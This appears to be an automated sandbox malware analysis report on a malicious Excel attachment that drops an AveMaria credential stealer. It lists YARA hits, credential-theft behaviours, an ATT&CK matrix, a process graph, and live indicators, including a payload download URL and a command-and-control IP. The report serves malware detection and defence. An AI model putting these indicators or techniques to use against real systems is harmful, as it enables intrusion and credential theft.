        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Lowering of HIPS / PFW / Operating System Security Settings:

        barindex
        Increases the number of concurrent connection per server for Internet ExplorerShow sources
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgRegistry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10Jump to behavior

        Stealing of Sensitive Information:

        barindex
        Yara detected AveMaria stealerShow sources
        Source: Yara matchFile source: 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000003.781273040.00000000006C6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000003.785717468.000000000061D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000003.785472155.000000000061D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000003.786517856.0000000000619000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000003.780359821.00000000006E6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 19.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.Test3.jpg.2ae0000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.Test3.jpg.2ae0000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.1.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.1.Test3.jpg.400000.0.unpack, type: UNPACKEDPE
        Yara detected Generic DropperShow sources
        Source: Yara matchFile source: Process Memory Space: Test3.jpg PID: 5940, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: Test3.jpg PID: 6852, type: MEMORY
        Tries to harvest and steal browser information (history, passwords, etc)Show sources
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Tries to steal Mail credentials (via file access)Show sources
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
        Source: Yara matchFile source: 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000003.781273040.00000000006C6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000003.780359821.00000000006E6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: Test3.jpg PID: 5940, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: Test3.jpg PID: 6852, type: MEMORY
        Source: Yara matchFile source: 19.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.Test3.jpg.2ae0000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.Test3.jpg.2ae0000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.1.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.1.Test3.jpg.400000.0.unpack, type: UNPACKEDPE

        Remote Access Functionality:

        barindex
        Yara detected AveMaria stealerShow sources
        Source: Yara matchFile source: 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000003.781273040.00000000006C6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000003.785717468.000000000061D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000003.785472155.000000000061D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000003.786517856.0000000000619000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000003.780359821.00000000006E6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 19.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.Test3.jpg.2ae0000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.Test3.jpg.2ae0000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.1.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.1.Test3.jpg.400000.0.unpack, type: UNPACKEDPE

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsWindows Management Instrumentation21LSASS Driver1LSASS Driver1Disable or Modify Tools2OS Credential Dumping1File and Directory Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationEndpoint Denial of Service1
        Default AccountsScripting11DLL Side-Loading1DLL Side-Loading1Scripting11Input Capture121System Information Discovery16Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsExploitation for Client Execution13Windows Service2Windows Service2Obfuscated Files or Information2Security Account ManagerQuery Registry1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsPowerShell2Logon Script (Mac)Process Injection412Software Packing23NTDSSecurity Software Discovery111Distributed Component Object ModelInput Capture121Scheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsVirtualization/Sandbox Evasion4SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol12Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading13Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion4DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection412Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Hidden Users2Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 337287 Sample: Telex06012020.xls Startdate: 08/01/2021 Architecture: WINDOWS Score: 100 66 Malicious sample detected (through community Yara rule) 2->66 68 Antivirus detection for dropped file 2->68 70 Multi AV Scanner detection for dropped file 2->70 72 13 other signatures 2->72 9 Test3.jpg 2->9         started        12 EXCEL.EXE 37 31 2->12         started        14 rdpvideominiport.sys 2->14         started        16 2 other processes 2->16 process3 signatures4 84 Antivirus detection for dropped file 9->84 86 Detected unpacking (changes PE section rights) 9->86 88 Detected unpacking (overwrites its own PE header) 9->88 94 2 other signatures 9->94 18 Test3.jpg 8 9 9->18         started        90 Document exploit detected (process start blacklist hit) 12->90 92 PowerShell case anomaly found 12->92 23 cmd.exe 1 12->23         started        process5 dnsIp6 62 37.46.150.86, 49747, 5200 IWAYCH Moldova Republic of 18->62 52 C:\Program Files\Microsoft DN1\sqlmap.dll, PE32+ 18->52 dropped 74 Hides user accounts 18->74 76 Tries to steal Mail credentials (via file access) 18->76 78 Tries to harvest and steal browser information (history, passwords, etc) 18->78 82 7 other signatures 18->82 25 powershell.exe 18 18->25         started        27 cmd.exe 18->27         started        80 PowerShell case anomaly found 23->80 29 powershell.exe 15 34 23->29         started        34 conhost.exe 23->34         started        file7 signatures8 process9 dnsIp10 36 conhost.exe 25->36         started        38 conhost.exe 27->38         started        64 lankarecipes.com 192.185.236.165, 49728, 80 UNIFIEDLAYER-AS-1US United States 29->64 58 C:\Users\user\AppData\Local\Temp\Test1.txt, PE32 29->58 dropped 60 C:\Users\user\AppData\...\mvqape5o.cmdline, UTF-8 29->60 dropped 96 Powershell drops PE file 29->96 40 cmd.exe 1 29->40         started        42 cmd.exe 2 29->42         started        45 csc.exe 3 29->45         started        file11 signatures12 process13 file14 47 WMIC.exe 1 40->47         started        54 C:\Users\user\AppData\Local\Temp\Test3.jpg, PE32 42->54 dropped 56 C:\Users\user\AppData\Local\...\mvqape5o.dll, PE32 45->56 dropped 50 cvtres.exe 1 45->50         started        process15 signatures16 98 Creates processes via WMI 47->98

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        Telex06012020.xls12%VirustotalBrowse

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\Test3.jpg100%AviraTR/Redcap.ghjpt
        C:\Users\user\AppData\Local\Temp\Test1.txt100%AviraTR/Redcap.ghjpt
        C:\Users\user\AppData\Local\Temp\Test3.jpg100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\Test1.txt100%Joe Sandbox ML
        C:\Program Files\Microsoft DN1\sqlmap.dll22%MetadefenderBrowse
        C:\Program Files\Microsoft DN1\sqlmap.dll41%ReversingLabsWin64.Trojan.RDPWrap

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        19.1.Test3.jpg.400000.0.unpack100%AviraTR/Redcap.ghjptDownload File
        18.2.Test3.jpg.2ae0000.1.unpack100%AviraTR/Redcap.ghjptDownload File
        19.0.Test3.jpg.400000.0.unpack100%AviraTR/Redcap.ghjptDownload File
        22.2.cmd.exe.5250000.1.unpack100%AviraTR/Dropper.GenDownload File
        18.0.Test3.jpg.400000.0.unpack100%AviraTR/Redcap.ghjptDownload File
        18.2.Test3.jpg.400000.0.unpack100%AviraTR/Redcap.ghjptDownload File
        19.2.Test3.jpg.400000.0.unpack100%AviraTR/Redcap.ghjptDownload File

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        https://cdn.entity.0%URL Reputationsafe
        https://cdn.entity.0%URL Reputationsafe
        https://cdn.entity.0%URL Reputationsafe
        https://wus2-000.contentsync.0%URL Reputationsafe
        https://wus2-000.contentsync.0%URL Reputationsafe
        https://wus2-000.contentsync.0%URL Reputationsafe
        https://powerlift.acompli.net0%URL Reputationsafe
        https://powerlift.acompli.net0%URL Reputationsafe
        https://powerlift.acompli.net0%URL Reputationsafe
        https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
        https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
        https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
        https://cortana.ai0%URL Reputationsafe
        https://cortana.ai0%URL Reputationsafe
        https://cortana.ai0%URL Reputationsafe
        https://api.aadrm.com/0%URL Reputationsafe
        https://api.aadrm.com/0%URL Reputationsafe
        https://api.aadrm.com/0%URL Reputationsafe
        https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
        http://lankarecipes.com/mages.jpg0%Avira URL Cloudsafe
        http://lankarecipes.com/mages.jp0%Avira URL Cloudsafe
        https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
        https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
        https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
        https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
        https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
        https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
        https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
        https://store.office.cn/addinstemplate0%URL Reputationsafe
        https://store.office.cn/addinstemplate0%URL Reputationsafe
        https://store.office.cn/addinstemplate0%URL Reputationsafe
        https://wus2-000.pagecontentsync.0%URL Reputationsafe
        https://wus2-000.pagecontentsync.0%URL Reputationsafe
        https://wus2-000.pagecontentsync.0%URL Reputationsafe
        https://go.micro0%URL Reputationsafe
        https://go.micro0%URL Reputationsafe
        https://go.micro0%URL Reputationsafe
        https://store.officeppe.com/addinstemplate0%URL Reputationsafe
        https://store.officeppe.com/addinstemplate0%URL Reputationsafe
        https://store.officeppe.com/addinstemplate0%URL Reputationsafe
        https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
        https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
        https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
        https://www.odwebp.svc.ms0%URL Reputationsafe
        https://www.odwebp.svc.ms0%URL Reputationsafe
        https://www.odwebp.svc.ms0%URL Reputationsafe
        https://dataservice.o365filtering.com/0%URL Reputationsafe
        https://dataservice.o365filtering.com/0%URL Reputationsafe
        https://dataservice.o365filtering.com/0%URL Reputationsafe
        https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
        https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
        https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
        https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
        https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
        https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
        http://stascorp.comDVarFileInfo$0%Avira URL Cloudsafe
        https://apis.live.net/v5.0/0%URL Reputationsafe
        https://apis.live.net/v5.0/0%URL Reputationsafe
        https://apis.live.net/v5.0/0%URL Reputationsafe
        https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
        https://ncus-000.contentsync.0%URL Reputationsafe
        https://ncus-000.contentsync.0%URL Reputationsafe
        https://ncus-000.contentsync.0%URL Reputationsafe
        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
        https://skyapi.live.net/Activity/0%URL Reputationsafe
        https://skyapi.live.net/Activity/0%URL Reputationsafe
        https://skyapi.live.net/Activity/0%URL Reputationsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        lankarecipes.com
        192.185.236.165
        truetrue
          unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://lankarecipes.com/mages.jpgfalse
          • Avira URL Cloud: safe
          unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://api.diagnosticssdf.office.com1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
            high
            https://login.microsoftonline.com/1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
              high
              https://shell.suite.office.com:14431C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                high
                https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                  high
                  https://autodiscover-s.outlook.com/1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                    high
                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                      high
                      https://cdn.entity.1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://api.addins.omex.office.net/appinfo/query1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                        high
                        https://wus2-000.contentsync.1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://clients.config.office.net/user/v1.0/tenantassociationkey1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                          high
                          https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                            high
                            https://powerlift.acompli.net1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            https://rpsticket.partnerservices.getmicrosoftkey.com1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            https://lookup.onenote.com/lookup/geolocation/v11C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                              high
                              https://cortana.ai1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                high
                                https://cloudfiles.onenote.com/upload.aspx1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                  high
                                  https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                    high
                                    https://entitlement.diagnosticssdf.office.com1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                      high
                                      https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                        high
                                        https://api.aadrm.com/1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        https://ofcrecsvcapi-int.azurewebsites.net/1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                          high
                                          https://api.microsoftstream.com/api/1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                            high
                                            https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                              high
                                              https://cr.office.com1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                high
                                                http://lankarecipes.com/mages.jpPowerShell_transcript.179605.1KVzgujm.20210108093427.txt.3.drtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://portal.office.com/account/?ref=ClientMeControl1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                  high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000015.00000002.877459698.0000000004FD1000.00000004.00000001.sdmpfalse
                                                    high
                                                    https://ecs.office.com/config/v2/Office1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                      high
                                                      https://graph.ppe.windows.net1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                        high
                                                        https://res.getmicrosoftkey.com/api/redemptionevents1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://powerlift-frontdesk.acompli.net1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://tasks.office.com1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                          high
                                                          https://officeci.azurewebsites.net/api/1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://sr.outlook.office.net/ws/speech/recognize/assistant/work1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                            high
                                                            https://store.office.cn/addinstemplate1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmpfalse
                                                              high
                                                              https://wus2-000.pagecontentsync.1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://go.micropowershell.exe, 00000003.00000003.731177309.0000000004F95000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://outlook.office.com/autosuggest/api/v1/init?cvid=1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                high
                                                                https://globaldisco.crm.dynamics.com1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                  high
                                                                  https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                    high
                                                                    https://store.officeppe.com/addinstemplate1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://dev0-api.acompli.net/autodetect1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://www.odwebp.svc.ms1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://api.powerbi.com/v1.0/myorg/groups1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                      high
                                                                      https://web.microsoftstream.com/video/1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                        high
                                                                        https://graph.windows.net1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                          high
                                                                          https://dataservice.o365filtering.com/1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://officesetup.getmicrosoftkey.com1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://analysis.windows.net/powerbi/api1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                            high
                                                                            https://prod-global-autodetect.acompli.net/autodetect1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://stascorp.comDVarFileInfo$Test3.jpg, 00000013.00000003.817118818.0000000004081000.00000004.00000001.sdmp, sqlmap.dll.19.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            low
                                                                            https://outlook.office365.com/autodiscover/autodiscover.json1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                              high
                                                                              https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                high
                                                                                https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                  high
                                                                                  https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                        high
                                                                                        https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                          high
                                                                                          http://weather.service.msn.com/data.aspx1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                            high
                                                                                            https://apis.live.net/v5.0/1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            https://github.com/syohex/java-simple-mine-sweeperC:Test3.jpg, 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp, Test3.jpg, 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmpfalse
                                                                                              high
                                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                                high
                                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.drfalse
                                                                                                  high
